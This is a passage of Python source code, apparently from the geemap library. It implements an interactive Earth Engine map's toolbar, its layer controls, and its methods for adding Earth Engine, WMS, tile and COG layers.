file_chooser.default_path = os.getcwd()
if change["new"] == "HTML":
file_chooser.default_filename = "my_map.html"
elif change["new"] == "PNG":
file_chooser.default_filename = "my_map.png"
elif change["new"] == "JPG":
file_chooser.default_filename = "my_map.jpg"
save_map_widget.children = [save_type, file_chooser]
def chooser_callback(chooser):
save_map_widget.children = [save_type, file_chooser, ok_cancel]
def ok_cancel_clicked(change):
if change["new"] == "OK":
file_path = file_chooser.selected
ext = os.path.splitext(file_path)[1]
if save_type.value == "HTML" and ext.upper() == ".HTML":
tool_output.clear_output()
self.to_html(file_path)
elif save_type.value == "PNG" and ext.upper() == ".PNG":
tool_output.clear_output()
self.toolbar_button.value = False
time.sleep(1)
screen_capture(outfile=file_path)
elif save_type.value == "JPG" and ext.upper() == ".JPG":
tool_output.clear_output()
self.toolbar_button.value = False
time.sleep(1)
screen_capture(outfile=file_path)
else:
label = widgets.Label(
value="The selected file extension does not match the selected exporting type."
)
save_map_widget.children = [save_type, file_chooser, label]
self.toolbar_reset()
elif change["new"] == "Cancel":
tool_output.clear_output()
self.toolbar_reset()
save_type.observe(save_type_changed, names="value")
ok_cancel.observe(ok_cancel_clicked, names="value")
file_chooser.register_callback(chooser_callback)
save_map_widget.children = [save_type, file_chooser]
tools = {
"info": {"name": "inspector", "tooltip": "Inspector"},
"bar-chart": {"name": "plotting", "tooltip": "Plotting"},
"camera": {
"name": "to_image",
"tooltip": "Save map as HTML or image",
},
"eraser": {
"name": "eraser",
"tooltip": "Remove all drawn features",
},
"folder-open": {
"name": "open_data",
"tooltip": "Open local vector/raster data",
},
# "cloud-download": {
# "name": "export_data",
# "tooltip": "Export Earth Engine data",
# },
"retweet": {
"name": "convert_js",
"tooltip": "Convert Earth Engine JavaScript to Python",
},
"gears": {
"name": "whitebox",
"tooltip": "WhiteboxTools for local geoprocessing",
},
"google": {
"name": "geetoolbox",
"tooltip": "GEE Toolbox for cloud computing",
},
"map": {
"name": "basemap",
"tooltip": "Change basemap",
},
"globe": {
"name": "timelapse",
"tooltip": "Create timelapse",
},
"fast-forward": {
"name": "timeslider",
"tooltip": "Activate timeslider",
},
"hand-o-up": {
"name": "draw",
"tooltip": "Collect training samples",
},
"line-chart": {
"name": "transect",
"tooltip": "Creating and plotting transects",
},
"random": {
"name": "sankee",
"tooltip": "Sankey plots",
},
"adjust": {
"name": "planet",
"tooltip": "Planet imagery",
},
"smile-o": {
"name": "placehold",
"tooltip": "This is a placehold",
},
"spinner": {
"name": "placehold2",
"tooltip": "This is a placehold",
},
"question": {
"name": "help",
"tooltip": "Get help",
},
}
if kwargs["use_voila"]:
voila_tools = ["camera", "folder-open", "cloud-download", "gears"]
for item in voila_tools:
if item in tools.keys():
del tools[item]
icons = list(tools.keys())
tooltips = [item["tooltip"] for item in list(tools.values())]
icon_width = "32px"
icon_height = "32px"
n_cols = 3
n_rows = math.ceil(len(icons) / n_cols)
toolbar_grid = widgets.GridBox(
children=[
widgets.ToggleButton(
layout=widgets.Layout(
width="auto", height="auto", padding="0px 0px 0px 4px"
),
button_style="primary",
icon=icons[i],
tooltip=tooltips[i],
)
for i in range(len(icons))
],
layout=widgets.Layout(
width="107px",
grid_template_columns=(icon_width + " ") * n_cols,
grid_template_rows=(icon_height + " ") * n_rows,
grid_gap="1px 1px",
padding="5px",
),
)
self.toolbar = toolbar_grid
def tool_callback(change):
if change["new"]:
current_tool = change["owner"]
for tool in toolbar_grid.children:
if tool is not current_tool:
tool.value = False
tool = change["owner"]
tool_name = tools[tool.icon]["name"]
if tool_name == "to_image":
if tool_output_control not in self.controls:
self.add_control(tool_output_control)
with tool_output:
tool_output.clear_output()
display(save_map_widget)
elif tool_name == "eraser":
self.remove_drawn_features()
tool.value = False
elif tool_name == "inspector":
self.inspector_checked = tool.value
if not self.inspector_checked:
inspector_output.clear_output()
elif tool_name == "plotting":
self.plot_checked = True
plot_dropdown_widget = widgets.Dropdown(
options=list(self.ee_raster_layer_names),
)
plot_dropdown_widget.layout.width = "18ex"
self.plot_dropdown_widget = plot_dropdown_widget
plot_dropdown_control = ipyleaflet.WidgetControl(
widget=plot_dropdown_widget, position="topright"
)
self.plot_dropdown_control = plot_dropdown_control
self.add_control(plot_dropdown_control)
if self.draw_control in self.controls:
self.remove_control(self.draw_control)
self.add_control(self.draw_control_lite)
elif tool_name == "open_data":
from .toolbar import open_data_widget
open_data_widget(self)
elif tool_name == "convert_js":
from .toolbar import convert_js2py
convert_js2py(self)
elif tool_name == "whitebox":
import whiteboxgui.whiteboxgui as wbt
tools_dict = wbt.get_wbt_dict()
wbt_toolbox = wbt.build_toolbox(
tools_dict, max_width="800px", max_height="500px"
)
wbt_control = ipyleaflet.WidgetControl(
widget=wbt_toolbox, position="bottomright"
)
self.whitebox = wbt_control
self.add_control(wbt_control)
elif tool_name == "geetoolbox":
from .toolbar import build_toolbox, get_tools_dict
tools_dict = get_tools_dict()
gee_toolbox = build_toolbox(
tools_dict, max_width="800px", max_height="500px"
)
geetoolbox_control = ipyleaflet.WidgetControl(
widget=gee_toolbox, position="bottomright"
)
self.geetoolbox = geetoolbox_control
self.add_control(geetoolbox_control)
elif tool_name == "basemap":
from .toolbar import change_basemap
change_basemap(self)
elif tool_name == "timelapse":
from .toolbar import timelapse
timelapse(self)
self.toolbar_reset()
elif tool_name == "timeslider":
from .toolbar import time_slider
time_slider(self)
self.toolbar_reset()
elif tool_name == "draw":
from .toolbar import collect_samples
self.training_ctrl = None
collect_samples(self)
elif tool_name == "transect":
from .toolbar import plot_transect
plot_transect(self)
elif tool_name == "sankee":
from .toolbar import sankee_gui
sankee_gui(self)
elif tool_name == "planet":
from .toolbar import split_basemaps
split_basemaps(self, layers_dict=planet_tiles())
self.toolbar_reset()
elif tool_name == "help":
import webbrowser
webbrowser.open_new_tab("https://geemap.org")
current_tool.value = False
else:
tool = change["owner"]
tool_name = tools[tool.icon]["name"]
if tool_name == "to_image":
tool_output.clear_output()
save_map_widget.children = [save_type, file_chooser]
if tool_output_control in self.controls:
self.remove_control(tool_output_control)
if tool_name == "inspector":
inspector_output.clear_output()
self.inspector_checked = False
if inspector_output_control in self.controls:
self.remove_control(inspector_output_control)
elif tool_name == "plotting":
self.plot_checked = False
plot_dropdown_widget = self.plot_dropdown_widget
plot_dropdown_control = self.plot_dropdown_control
if plot_dropdown_control in self.controls:
self.remove_control(plot_dropdown_control)
del plot_dropdown_widget
del plot_dropdown_control
if self.plot_control in self.controls:
plot_control = self.plot_control
plot_widget = self.plot_widget
self.remove_control(plot_control)
self.plot_control = None
self.plot_widget = None
del plot_control
del plot_widget
if (
self.plot_marker_cluster is not None
and self.plot_marker_cluster in self.layers
):
self.remove_layer(self.plot_marker_cluster)
if self.draw_control_lite in self.controls:
self.remove_control(self.draw_control_lite)
self.add_control(self.draw_control)
elif tool_name == "whitebox":
if self.whitebox is not None and self.whitebox in self.controls:
self.remove_control(self.whitebox)
elif tool_name == "convert_js":
if (
self.convert_ctrl is not None
and self.convert_ctrl in self.controls
):
self.remove_control(self.convert_ctrl)
for tool in toolbar_grid.children:
tool.observe(tool_callback, "value")
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="wrench",
layout=widgets.Layout(
width="28px", height="28px", padding="0px 0px 0px 4px"
),
)
self.toolbar_button = toolbar_button
layers_button = widgets.ToggleButton(
value=False,
tooltip="Layers",
icon="server",
layout=widgets.Layout(height="28px", width="72px"),
)
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [layers_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [toolbar_grid]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
layers_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
layers_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not layers_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def layers_btn_click(change):
if change["new"]:
layers_hbox = []
all_layers_chk = widgets.Checkbox(
value=False,
description="All layers on/off",
indent=False,
layout=widgets.Layout(height="18px", padding="0px 8px 25px 8px"),
)
all_layers_chk.layout.width = "30ex"
layers_hbox.append(all_layers_chk)
def all_layers_chk_changed(change):
if change["new"]:
for layer in self.layers:
layer.visible = True
else:
for layer in self.layers:
layer.visible = False
all_layers_chk.observe(all_layers_chk_changed, "value")
layers = [
lyr
for lyr in self.layers[1:]
if (
isinstance(lyr, ipyleaflet.TileLayer)
or isinstance(lyr, ipyleaflet.WMSLayer)
)
]
# if the layers contain unsupported layers (e.g., GeoJSON, GeoData), adds the ipyleaflet built-in LayerControl
if len(layers) < (len(self.layers) - 1):
if self.layer_control is None:
layer_control = ipyleaflet.LayersControl(position="topright")
self.layer_control = layer_control
if self.layer_control not in self.controls:
self.add_control(self.layer_control)
# for non-TileLayer, use layer.style={'opacity':0, 'fillOpacity': 0} to turn layer off.
for layer in layers:
layer_chk = widgets.Checkbox(
value=layer.visible,
description=layer.name,
indent=False,
layout=widgets.Layout(height="18px"),
)
layer_chk.layout.width = "25ex"
layer_opacity = widgets.FloatSlider(
value=layer.opacity,
min=0,
max=1,
step=0.01,
readout=False,
layout=widgets.Layout(width="80px"),
)
layer_settings = widgets.ToggleButton(
icon="gear",
tooltip=layer.name,
layout=widgets.Layout(
width="25px", height="25px", padding="0px 0px 0px 5px"
),
)
def layer_vis_on_click(change):
if change["new"]:
layer_name = change["owner"].tooltip
# if layer_name in self.ee_raster_layer_names:
if layer_name in self.ee_layer_names:
layer_dict = self.ee_layer_dict[layer_name]
if self.vis_widget is not None:
self.vis_widget = None
self.vis_widget = self.create_vis_widget(layer_dict)
if self.vis_control in self.controls:
self.remove_control(self.vis_control)
self.vis_control = None
vis_control = ipyleaflet.WidgetControl(
widget=self.vis_widget, position="topright"
)
self.add_control(vis_control)
self.vis_control = vis_control
else:
if self.vis_widget is not None:
self.vis_widget = None
if self.vis_control is not None:
if self.vis_control in self.controls:
self.remove_control(self.vis_control)
self.vis_control = None
change["owner"].value = False
layer_settings.observe(layer_vis_on_click, "value")
def layer_chk_changed(change):
layer_name = change["owner"].description
if layer_name in self.ee_layer_names:
if change["new"]:
if "legend" in self.ee_layer_dict[layer_name].keys():
legend = self.ee_layer_dict[layer_name]["legend"]
if legend not in self.controls:
self.add_control(legend)
if "colorbar" in self.ee_layer_dict[layer_name].keys():
colorbar = self.ee_layer_dict[layer_name][
"colorbar"
]
if colorbar not in self.controls:
self.add_control(colorbar)
else:
if "legend" in self.ee_layer_dict[layer_name].keys():
legend = self.ee_layer_dict[layer_name]["legend"]
if legend in self.controls:
self.remove_control(legend)
if "colorbar" in self.ee_layer_dict[layer_name].keys():
colorbar = self.ee_layer_dict[layer_name][
"colorbar"
]
if colorbar in self.controls:
self.remove_control(colorbar)
layer_chk.observe(layer_chk_changed, "value")
widgets.jslink((layer_chk, "value"), (layer, "visible"))
widgets.jsdlink((layer_opacity, "value"), (layer, "opacity"))
hbox = widgets.HBox(
[layer_chk, layer_settings, layer_opacity],
layout=widgets.Layout(padding="0px 8px 0px 8px"),
)
layers_hbox.append(hbox)
toolbar_footer.children = layers_hbox
toolbar_button.value = False
else:
toolbar_footer.children = [toolbar_grid]
layers_button.observe(layers_btn_click, "value")
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if kwargs.get("toolbar_ctrl"):
self.add_control(toolbar_control)
tool_output_control = ipyleaflet.WidgetControl(
widget=tool_output, position="topright"
)
# self.add_control(tool_output_control)
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
if kwargs.get("type") == "click" and self.inspector_checked:
self.default_style = {"cursor": "wait"}
if inspector_output_control not in self.controls:
self.add_control(inspector_output_control)
sample_scale = self.getScale()
layers = self.ee_layers
with inspector_output:
inspector_output.clear_output(wait=True)
print(
f"Point ({latlon[1]:.4f}, {latlon[0]:.4f}) at {int(self.get_scale())}m/px"
)
xy = ee.Geometry.Point(latlon[::-1])
for index, ee_object in enumerate(layers):
layer_names = self.ee_layer_names
layer_name = layer_names[index]
object_type = ee_object.__class__.__name__
if not self.ee_layer_dict[layer_name]["ee_layer"].visible:
continue
try:
if isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
elif (
isinstance(ee_object, ee.geometry.Geometry)
or isinstance(ee_object, ee.feature.Feature)
or isinstance(
ee_object,
ee.featurecollection.FeatureCollection,
)
):
ee_object = ee.FeatureCollection(ee_object)
if isinstance(ee_object, ee.Image):
item = ee_object.reduceRegion(
ee.Reducer.first(), xy, sample_scale
).getInfo()
b_name = "band"
if len(item) > 1:
b_name = "bands"
print(
"{}: {} ({} {})".format(
layer_name,
object_type,
len(item),
b_name,
)
)
keys = item.keys()
for key in keys:
print(f" {key}: {item[key]}")
elif isinstance(ee_object, ee.FeatureCollection):
# Check geometry type
geom_type = (
ee.Feature(ee_object.first()).geometry().type()
)
lat, lon = latlon
delta = 0.005
bbox = ee.Geometry.BBox(
lon - delta,
lat - delta,
lon + delta,
lat + delta,
)
# Create a bounding box to filter points
xy = ee.Algorithms.If(
geom_type.compareTo(ee.String("Point")),
xy,
bbox,
)
filtered = ee_object.filterBounds(xy)
size = filtered.size().getInfo()
if size > 0:
first = filtered.first()
props = first.toDictionary().getInfo()
b_name = "property"
if len(props) > 1:
b_name = "properties"
print(
f"{layer_name}: Feature ({len(props)} {b_name})"
)
keys = props.keys()
for key in keys:
print(f" {key}: {props[key]}")
except Exception as e:
print(e)
self.default_style = {"cursor": "crosshair"}
if (
kwargs.get("type") == "click"
and self.plot_checked
and len(self.ee_raster_layers) > 0
):
plot_layer_name = self.plot_dropdown_widget.value
layer_names = self.ee_raster_layer_names
layers = self.ee_raster_layers
index = layer_names.index(plot_layer_name)
ee_object = layers[index]
if isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
try:
self.default_style = {"cursor": "wait"}
plot_options = self.plot_options
sample_scale = self.getScale()
if "sample_scale" in plot_options.keys() and (
plot_options["sample_scale"] is not None
):
sample_scale = plot_options["sample_scale"]
if "title" not in plot_options.keys():
plot_options["title"] = plot_layer_name
if ("add_marker_cluster" in plot_options.keys()) and plot_options[
"add_marker_cluster"
]:
plot_coordinates = self.plot_coordinates
markers = self.plot_markers
marker_cluster = self.plot_marker_cluster
plot_coordinates.append(latlon)
self.plot_last_click = latlon
self.plot_all_clicks = plot_coordinates
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
self.plot_marker_cluster = marker_cluster
band_names = ee_object.bandNames().getInfo()
if any(len(name) > 3 for name in band_names):
band_names = list(range(1, len(band_names) + 1))
self.chart_labels = band_names
if self.roi_end:
if self.roi_reducer_scale is None:
scale = ee_object.select(0).projection().nominalScale()
else:
scale = self.roi_reducer_scale
dict_values_tmp = ee_object.reduceRegion(
reducer=self.roi_reducer,
geometry=self.user_roi,
scale=scale,
bestEffort=True,
).getInfo()
b_names = ee_object.bandNames().getInfo()
dict_values = dict(
zip(b_names, [dict_values_tmp[b] for b in b_names])
)
self.chart_points.append(
self.user_roi.centroid(1).coordinates().getInfo()
)
else:
xy = ee.Geometry.Point(latlon[::-1])
dict_values_tmp = (
ee_object.sample(xy, scale=sample_scale)
.first()
.toDictionary()
.getInfo()
)
b_names = ee_object.bandNames().getInfo()
dict_values = dict(
zip(b_names, [dict_values_tmp[b] for b in b_names])
)
self.chart_points.append(xy.coordinates().getInfo())
band_values = list(dict_values.values())
self.chart_values.append(band_values)
self.plot(band_names, band_values, **plot_options)
if plot_options["title"] == plot_layer_name:
del plot_options["title"]
self.default_style = {"cursor": "crosshair"}
self.roi_end = False
except Exception as e:
if self.plot_widget is not None:
with self.plot_widget:
self.plot_widget.clear_output()
print("No data for the clicked location.")
else:
print(e)
self.default_style = {"cursor": "crosshair"}
self.roi_end = False
self.on_interaction(handle_interaction)
def set_options(self, mapTypeId="HYBRID", styles=None, types=None):
"""Adds Google basemap and controls to the ipyleaflet map.
Args:
mapTypeId (str, optional): A mapTypeId to set the basemap to. Can be one of "ROADMAP", "SATELLITE", "HYBRID" or "TERRAIN" to select one of the standard Google Maps API map types. Defaults to 'HYBRID'.
styles (object, optional): A dictionary of custom MapTypeStyle objects keyed with a name that will appear in the map's Map Type Controls. Defaults to None.
types (list, optional): A list of mapTypeIds to make available. If omitted, but styles is specified, appends all of the style keys to the standard Google Maps API map types. Defaults to None.
"""
self.clear_layers()
self.clear_controls()
self.scroll_wheel_zoom = True
self.add_control(ipyleaflet.ZoomControl(position="topleft"))
self.add_control(ipyleaflet.LayersControl(position="topright"))
self.add_control(ipyleaflet.ScaleControl(position="bottomleft"))
self.add_control(ipyleaflet.FullScreenControl())
self.add_control(ipyleaflet.DrawControl())
measure = ipyleaflet.MeasureControl(
position="bottomleft",
active_color="orange",
primary_length_unit="kilometers",
)
self.add_control(measure)
try:
self.add_layer(basemap_tiles[mapTypeId])
except Exception:
raise ValueError(
'Google basemaps can only be one of "ROADMAP", "SATELLITE", "HYBRID" or "TERRAIN".'
)
setOptions = set_options
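# Example (illustrative): switch the basemap to Google Satellite or Terrain imagery
# while resetting the default controls, using either alias.
#   m.set_options("SATELLITE")
#   m.setOptions(mapTypeId="TERRAIN")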
def add_ee_layer(
self, ee_object, vis_params={}, name=None, shown=True, opacity=1.0
):
"""Adds a given EE object to the map as a layer.
Args:
ee_object (Collection|Feature|Image|MapId): The object to add to the map.
vis_params (dict, optional): The visualization parameters. Defaults to {}.
name (str, optional): The name of the layer. Defaults to 'Layer N'.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
opacity (float, optional): The layer's opacity represented as a number between 0 and 1. Defaults to 1.
"""
from box import Box
image = None
if name is None:
layer_count = len(self.layers)
name = "Layer " + str(layer_count + 1)
if (
not isinstance(ee_object, ee.Image)
and not isinstance(ee_object, ee.ImageCollection)
and not isinstance(ee_object, ee.FeatureCollection)
and not isinstance(ee_object, ee.Feature)
and not isinstance(ee_object, ee.Geometry)
):
err_str = "\n\nThe image argument in 'addLayer' function must be an instance of one of ee.Image, ee.Geometry, ee.Feature or ee.FeatureCollection."
raise AttributeError(err_str)
if (
isinstance(ee_object, ee.geometry.Geometry)
or isinstance(ee_object, ee.feature.Feature)
or isinstance(ee_object, ee.featurecollection.FeatureCollection)
):
features = ee.FeatureCollection(ee_object)
width = 2
if "width" in vis_params:
width = vis_params["width"]
color = "000000"
if "color" in vis_params:
color = vis_params["color"]
image_fill = features.style(**{"fillColor": color}).updateMask(
ee.Image.constant(0.5)
)
image_outline = features.style(
**{"color": color, "fillColor": "00000000", "width": width}
)
image = image_fill.blend(image_outline)
elif isinstance(ee_object, ee.image.Image):
image = ee_object
elif isinstance(ee_object, ee.imagecollection.ImageCollection):
image = ee_object.mosaic()
if "palette" in vis_params and isinstance(vis_params["palette"], Box):
try:
vis_params["palette"] = vis_params["palette"]["default"]
except Exception as e:
print("The provided palette is invalid.")
raise Exception(e)
map_id_dict = ee.Image(image).getMapId(vis_params)
tile_layer = ipyleaflet.TileLayer(
url=map_id_dict["tile_fetcher"].url_format,
attribution="Google Earth Engine",
name=name,
opacity=opacity,
visible=shown,
)
layer = self.find_layer(name=name)
if layer is not None:
existing_object = self.ee_layer_dict[name]["ee_object"]
if isinstance(existing_object, ee.Image) or isinstance(
existing_object, ee.ImageCollection
):
self.ee_raster_layers.remove(existing_object)
self.ee_raster_layer_names.remove(name)
if self.plot_dropdown_widget is not None:
self.plot_dropdown_widget.options = list(self.ee_raster_layer_names)
elif (
isinstance(ee_object, ee.Geometry)
or isinstance(ee_object, ee.Feature)
or isinstance(ee_object, ee.FeatureCollection)
):
self.ee_vector_layers.remove(existing_object)
self.ee_vector_layer_names.remove(name)
self.ee_layers.remove(existing_object)
self.ee_layer_names.remove(name)
self.remove_layer(layer)
self.ee_layers.append(ee_object)
if name not in self.ee_layer_names:
self.ee_layer_names.append(name)
self.ee_layer_dict[name] = {
"ee_object": ee_object,
"ee_layer": tile_layer,
"vis_params": vis_params,
}
self.add_layer(tile_layer)
self.last_ee_layer = self.ee_layer_dict[name]
self.last_ee_data = self.ee_layer_dict[name]["ee_object"]
if isinstance(ee_object, ee.Image) or isinstance(ee_object, ee.ImageCollection):
self.ee_raster_layers.append(ee_object)
self.ee_raster_layer_names.append(name)
if self.plot_dropdown_widget is not None:
self.plot_dropdown_widget.options = list(self.ee_raster_layer_names)
elif (
isinstance(ee_object, ee.Geometry)
or isinstance(ee_object, ee.Feature)
or isinstance(ee_object, ee.FeatureCollection)
):
self.ee_vector_layers.append(ee_object)
self.ee_vector_layer_names.append(name)
addLayer = add_ee_layer
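# Example (assumes an initialized Earth Engine session; the asset ID and vis_params
# are illustrative): add a raster layer with explicit visualization parameters.
#   dem = ee.Image("USGS/SRTMGL1_003")
#   m.addLayer(dem, {"min": 0, "max": 4000, "palette": ["006633", "E5FFCC", "662A00", "D8D8D8", "F5F5F5"]}, "SRTM DEM")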
def remove_ee_layer(self, name):
"""Removes an Earth Engine layer.
Args:
name (str): The name of the Earth Engine layer to remove.
"""
if name in self.ee_layer_dict:
ee_object = self.ee_layer_dict[name]["ee_object"]
ee_layer = self.ee_layer_dict[name]["ee_layer"]
if name in self.ee_raster_layer_names:
self.ee_raster_layer_names.remove(name)
self.ee_raster_layers.remove(ee_object)
elif name in self.ee_vector_layer_names:
self.ee_vector_layer_names.remove(name)
self.ee_vector_layers.remove(ee_object)
self.ee_layers.remove(ee_object)
self.ee_layer_names.remove(name)
if ee_layer in self.layers:
self.remove_layer(ee_layer)
def draw_layer_on_top(self):
"""Move user-drawn feature layer to the top of all layers."""
draw_layer_index = self.find_layer_index(name="Drawn Features")
if draw_layer_index > -1 and draw_layer_index < (len(self.layers) - 1):
layers = list(self.layers)
layers = (
layers[0:draw_layer_index]
+ layers[(draw_layer_index + 1) :]
+ [layers[draw_layer_index]]
)
self.layers = layers
def set_center(self, lon, lat, zoom=None):
"""Centers the map view at a given coordinates with the given zoom level.
Args:
lon (float): The longitude of the center, in degrees.
lat (float): The latitude of the center, in degrees.
zoom (int, optional): The zoom level, from 1 to 24. Defaults to None.
"""
self.center = (lat, lon)
if zoom is not None:
self.zoom = zoom
setCenter = set_center
def center_object(self, ee_object, zoom=None):
"""Centers the map view on a given object.
Args:
ee_object (Element|Geometry): An Earth Engine object to center on a geometry, image or feature.
zoom (int, optional): The zoom level, from 1 to 24. Defaults to None.
"""
if zoom is None and hasattr(self, "fit_bounds"):
self.zoom_to_object(ee_object)
else:
lat = 0
lon = 0
if isinstance(ee_object, ee.geometry.Geometry):
centroid = ee_object.centroid(1)
lon, lat = centroid.getInfo()["coordinates"]
else:
try:
centroid = ee_object.geometry().centroid(1)
lon, lat = centroid.getInfo()["coordinates"]
except Exception as e:
print(e)
raise Exception(e)
self.setCenter(lon, lat, zoom)
centerObject = center_object
def zoom_to_object(self, ee_object):
"""Zoom to the full extent of an Earth Engine object.
Args:
ee_object (object): An Earth Engine object, such as Image, ImageCollection, Geometry, Feature, FeatureCollection.
Raises:
Exception: Error getting geometry.
"""
coordinates = None
if isinstance(ee_object, ee.geometry.Geometry):
bounds = ee_object.bounds()
coordinates = bounds.getInfo()["coordinates"][0]
else:
try:
bounds = ee_object.geometry().bounds()
coordinates = bounds.getInfo()["coordinates"][0]
except Exception as e:
print(e)
raise Exception(e)
if coordinates is not None:
south = coordinates[0][1]
west = coordinates[0][0]
north = coordinates[2][1]
east = coordinates[2][0]
self.fit_bounds([[south, east], [north, west]])
zoomToObject = zoom_to_object
def zoom_to_me(self, zoom=14, add_marker=True):
"""Zoom to the current device location.
Args:
zoom (int, optional): Zoom level. Defaults to 14.
add_marker (bool, optional): Whether to add a marker of the current device location. Defaults to True.
"""
lat, lon = get_current_latlon()
self.set_center(lon, lat, zoom)
if add_marker:
marker = ipyleaflet.Marker(
location=(lat, lon),
draggable=False,
name="Device location",
)
self.add_layer(marker)
def get_scale(self):
"""Returns the approximate pixel scale of the current map view, in meters.
Returns:
float: Map resolution in meters.
"""
zoom_level = self.zoom
# Reference: https://blogs.bing.com/maps/2006/02/25/map-control-zoom-levels-gt-resolution
resolution = 156543.04 * math.cos(0) / math.pow(2, zoom_level)
return resolution
getScale = get_scale
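# Worked example of the formula above (a sketch; it assumes the equator, since
# cos(0) is used regardless of the map's latitude): at zoom level 4 the approximate
# resolution is 156543.04 / 2**4, i.e. roughly 9784 m per pixel.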
def add_basemap(self, basemap="HYBRID"):
"""Adds a basemap to the map.
Args:
basemap (str, optional): Can be one of the strings from ee_basemaps. Defaults to 'HYBRID'.
"""
try:
if (
basemap in basemap_tiles.keys()
and basemap_tiles[basemap] not in self.layers
):
self.add_layer(basemap_tiles[basemap])
except Exception:
raise ValueError(
"Basemap can only be one of the following:\n {}".format(
"\n ".join(basemap_tiles.keys())
)
)
def find_layer(self, name):
"""Finds layer by name
Args:
name (str): Name of the layer to find.
Returns:
object: ipyleaflet layer object.
"""
layers = self.layers
for layer in layers:
if layer.name == name:
return layer
return None
def find_layer_index(self, name):
"""Finds layer index by name
Args:
name (str): Name of the layer to find.
Returns:
int: Index of the layer with the specified name
"""
layers = self.layers
for index, layer in enumerate(layers):
if layer.name == name:
return index
return -1
def layer_opacity(self, name, value=1.0):
"""Changes layer opacity.
Args:
name (str): The name of the layer to change opacity.
value (float, optional): The opacity value to set. Defaults to 1.0.
"""
layer = self.find_layer(name)
try:
layer.opacity = value
except Exception as e:
raise Exception(e)
def add_wms_layer(
self,
url,
layers,
name=None,
attribution="",
format="image/jpeg",
transparent=False,
opacity=1.0,
shown=True,
**kwargs,
):
"""Add a WMS layer to the map.
Args:
url (str): The URL of the WMS web service.
layers (str): Comma-separated list of WMS layers to show.
name (str, optional): The layer name to use on the layer control. Defaults to None.
attribution (str, optional): The attribution of the data layer. Defaults to ''.
format (str, optional): WMS image format (use ‘image/png’ for layers with transparency). Defaults to 'image/jpeg'.
transparent (bool, optional): If True, the WMS service will return images with transparency. Defaults to False.
opacity (float, optional): The opacity of the layer. Defaults to 1.0.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
"""
if name is None:
name = str(layers)
try:
wms_layer = ipyleaflet.WMSLayer(
url=url,
layers=layers,
name=name,
attribution=attribution,
format=format,
transparent=transparent,
opacity=opacity,
visible=shown,
**kwargs,
)
self.add_layer(wms_layer)
except Exception as e:
print("Failed to add the specified WMS TileLayer.")
raise Exception(e)
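# Example (the service URL and layer name below are illustrative placeholders,
# not endpoints verified here): overlay a transparent PNG WMS layer.
#   m.add_wms_layer(
#       url="https://example.com/geoserver/wms",
#       layers="workspace:landcover",
#       name="Land cover",
#       format="image/png",
#       transparent=True,
#   )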
def add_tile_layer(
self,
url="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png",
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
**kwargs,
):
"""Adds a TileLayer to the map.
Args:
url (str, optional): The URL of the tile layer. Defaults to 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
"""
try:
tile_layer = ipyleaflet.TileLayer(
url=url,
name=name,
attribution=attribution,
opacity=opacity,
visible=shown,
**kwargs,
)
self.add_layer(tile_layer)
except Exception as e:
print("Failed to add the specified TileLayer.")
raise Exception(e)
def add_cog_layer(
self,
url,
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
titiler_endpoint="https://api.cogeo.xyz/",
**kwargs,
):
"""Adds a COG TileLayer to the map.
Args:
url (str): The URL of the COG tile layer.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
titiler_endpoint (str, optional): Titiler endpoint. Defaults to "https://api.cogeo.xyz/".
"""
tile_url = get_cog_tile(url, titiler_endpoint, **kwargs)
center = get_cog_center(url, titiler_endpoint) # (lon, lat)
self.add_tile_layer(tile_url, name, attribution, opacity, shown)
self.set_center(lon=center[0], lat=center[1], zoom=10)
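# Example (the COG URL is an illustrative placeholder): add a Cloud Optimized
# GeoTIFF; the map is then recentered on the COG at zoom 10, as in the code above.
#   m.add_cog_layer("https://example.com/data/scene.tif", name="My COG")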
def add_cog_mosaic(
self,
links,
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
titiler_endpoint="https://api.cogeo.xyz/",
username="anonymous",
overwrite=False,
show_footprints=False,
verbose=True,
**kwargs,
):
"""Add a virtual mosaic of COGs to the map.
Args:
links (list): A list of links pointing to COGs.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
titiler_endpoint (str, optional): Titiler endpoint. Defaults to "https://api.cogeo.xyz/".
username (str, optional): The username to create mosaic using the titiler endpoint. Defaults to 'anonymous'.
overwrite (bool, optional): Whether or not to replace existing layer with the same layer name. Defaults to False.
show_footprints (bool, optional): Whether or not to show footprints of COGs. Defaults to False.
verbose (bool, optional): Whether or not to print descriptions. Defaults to True.
"""
layername = name.replace(" ", "_")
